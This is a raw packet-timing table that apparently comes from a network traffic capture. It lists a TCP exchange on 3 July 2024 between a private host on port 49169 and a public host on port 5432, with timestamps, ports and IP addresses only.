Jul 3, 2024 02:22:30.965079069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.967959881 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.967968941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.968008995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.968153000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.968161106 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.968189001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.971127987 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.971179962 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.971200943 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.971210003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.971240044 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.971565008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.971602917 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.974006891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.974021912 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.974050999 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.974060059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.974076986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.974085093 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.974114895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.976985931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.976993084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.977031946 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.977104902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.977113962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.977147102 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.979945898 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.979955912 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.979964972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.979995012 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.980005980 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.982952118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.982960939 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.982990980 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.983001947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.984819889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.984827995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.984865904 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.985898018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.985915899 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.985925913 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.985941887 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.985951900 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.985970020 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.989348888 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.989357948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.989389896 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.989399910 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.990253925 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.990262032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.990294933 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.991717100 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.991724968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.991759062 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.991789103 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.991796970 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.991831064 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.994622946 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.994630098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.994668961 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.994678974 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.994719982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.994729042 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.994760036 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.997385025 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.997406006 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.997415066 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.997427940 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.997440100 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.000212908 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.000224113 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.000233889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.000256062 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.000268936 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.003443956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.003463984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.003473043 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.003496885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.003509045 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.006515026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.006525993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.006536961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.006553888 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.006565094 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.008398056 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.008408070 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.008418083 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.008456945 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.008466005 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.011077881 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.011122942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.011126995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.011132956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.011157036 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.011167049 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.013607979 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.013616085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.013658047 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.013694048 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.013703108 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.013734102 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.016124964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.016133070 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.016171932 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.016206026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.016215086 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.016248941 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.016258955 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.018843889 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.018877029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.018901110 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.018915892 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.018933058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.018942118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.018970966 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.021245956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.021255970 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.021265030 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.021296978 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.021306992 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.023710966 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.023720980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.023730040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.023762941 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.023772001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.026460886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.026472092 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.026479959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.026508093 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.026516914 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.028100967 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.028110027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.028119087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.028141022 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.028158903 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.030220985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.030252934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.030284882 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.030293941 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.030345917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.030355930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.030395985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.031923056 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.031930923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.031972885 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.032001019 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.032022953 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.032042027 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.032051086 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.033795118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.033828020 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.033840895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.033858061 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.033870935 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.033919096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.033921003 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.033958912 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.035592079 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.035600901 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.035641909 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.035716057 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.035723925 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.035752058 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.037458897 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.037468910 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.037477970 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.037503004 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.037513018 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.039279938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.039329052 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.039347887 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.039388895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.039391994 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.039400101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.039437056 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.041075945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.041086912 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.041095018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.041126013 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.041140079 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.042853117 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.042870045 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.042877913 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.042905092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.042938948 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.044430971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.044456959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.044466019 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.044487953 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.044497967 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.046318054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.046325922 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.046334982 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.046344042 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.046367884 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.046376944 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.047780991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.047791004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.047800064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.047827959 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.047837019 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.049479961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.049489021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.049498081 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.049524069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.049534082 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.050998926 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.051007032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.051045895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.051100969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.051110029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.051151037 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.052717924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.052727938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.052737951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.052763939 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.052773952 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.054167032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.054209948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.054215908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.054219961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.054249048 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.054249048 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.054277897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.054277897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.055737972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.055747032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.055788040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.055794001 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.055800915 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.055829048 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.057233095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.057243109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.057255983 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.057281971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.057291985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.058712006 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.058759928 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.058808088 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.058815956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.058825016 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.058851004 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.058861017 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.060250998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.060261011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.060270071 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.060298920 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.060308933 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.061788082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.061798096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.061806917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.061840057 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.063169956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.063184023 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.063225985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.063256979 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.063266993 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.063294888 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.064848900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.064858913 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.064868927 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.064892054 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.064908981 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.065965891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.065988064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.066011906 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.066021919 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.066066980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.066076040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.066112995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.067687988 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.067703962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.067735910 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.067790031 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.067801952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.067843914 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.068909883 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.068921089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.068931103 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.068958998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.068979025 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.070302010 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.070312023 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.070324898 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.070353031 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.070368052 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.071625948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.071664095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.071666956 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.071672916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.071706057 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.075519085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.075527906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.075539112 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.075547934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.075557947 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.075565100 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.075579882 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.075601101 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.081022024 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.081037045 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.081053972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.081063032 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.081065893 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.081073046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.081084967 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.081091881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.081094980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.081104040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.081125021 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.081146002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.085247040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.085292101 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.085298061 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.085306883 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.085335970 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.085361958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.085371971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.085383892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.085391998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.085402966 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.085423946 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.094151974 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.094162941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.094172001 CEST	5432	49169	116.202.180.70	192.168.2.22
